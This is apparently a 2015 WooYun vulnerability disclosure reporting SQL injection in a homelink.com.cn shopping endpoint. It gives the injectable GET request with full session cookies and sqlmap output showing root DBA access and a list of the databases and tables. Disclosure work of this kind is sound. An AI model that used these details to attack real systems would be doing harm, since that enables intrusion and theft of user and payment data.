当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135658

漏洞标题:链家某处存在sql注入

相关厂商:homelink.com.cn

漏洞作者: 路人甲

提交时间:2015-08-20 17:22

修复时间:2015-10-04 17:30

公开时间:2015-10-04 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-20: 厂商已经确认,细节仅向厂商公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

RT

详细说明:

直接sqlmap跑不出来的,后端做了一定的处理。
GET /aigou/?a=checkstatus&c=index&goods_id=1&prtotalnum=&sku_jilu= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://ilife.homelink.com.cn/aigou/?c=index&a=orderbuy&id=106714
Cookie: visited=yes; JSESSIONID=abcQs2rBTxnzHdpre3H7u; ONLINE_TIME=1438309323095; DIFF=1438308308050; SUV=1438310417257352; sessionid=143831041725735214383101349257911438308308048|13; sessionid2=143831041725735214383101349257911438308308048|13; NUV=1438358400000; IPLOC=unknown; __utma=113262040.1989192619.1438308387.1438308387.1438308387.1; __utmb=113262040.4.10.1438308387; __utmc=113262040; __utmz=113262040.1438308387.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; ppinf17173=2|1438308427|1|dWlkOjEyNDMxOTY0MHxuaWNrbmFtZToxNzE3MyVFNyU4RSVBOSVFNSVBRSVCNl8xNjAyOTAxMzV8dmVyaWZpZWQ6MXxyZWd0aW1lOjE0MzIyMDExNTd8dXNlcm5hbWU6MzY0OTUwNDY2QHFxLmNvbQ|1; pprdig17173=xBu9-eyhtaMvmnNWvZdL1VYo5JHmsrfuhLMIDNTY9cD4e3jFBfuzrRThJ8LHQtaMO8CN1sscV0NWsKUJ5bOtfqjtLehZziOARCVyZoSZi79RE_ey3s5CFclGJfTIRlHqGFAqXmPGzdJzNJAxsjN-3pk7-EYJ1Gl6BHd_TnRtFKs; lastdomain17173=1469844427|MzY0OTUwNDY2QHFxLmNvbQ==|17173.com; login_17173ppinfocrosscookie=1; PHPSESSID=36soaicbo8iftbjhn7kk3fqdi2
Host: ilife.homelink.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

漏洞证明:

20150820170347.jpg


current user:    'root@localhost'
current user is DBA: True
available databases [5]:
[*] homelink
[*] homelink_test
[*] information_schema
[*] mysql
[*] test
Database: homelink
[21 tables]
+-----------------+
| act_user |
| action_price |
| admin |
| adver_manage |
| coupon |
| goods |
| goods_class |
| goods_comments |
| goods_integral |
| goods_sku |
| management |
| order_innetinfo |
| orderinfo |
| payinfo |
| saleprop |
| template |
| topalipay |
| user_address |
| user_shops |
| userinfo |
| userlog |
+-----------------+

修复方案:

WooYun: 链家I生活平台另一处sql注入
这个还没完全修复。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-08-20 17:28

厂商回复:

确认,谢谢

最新状态:

暂无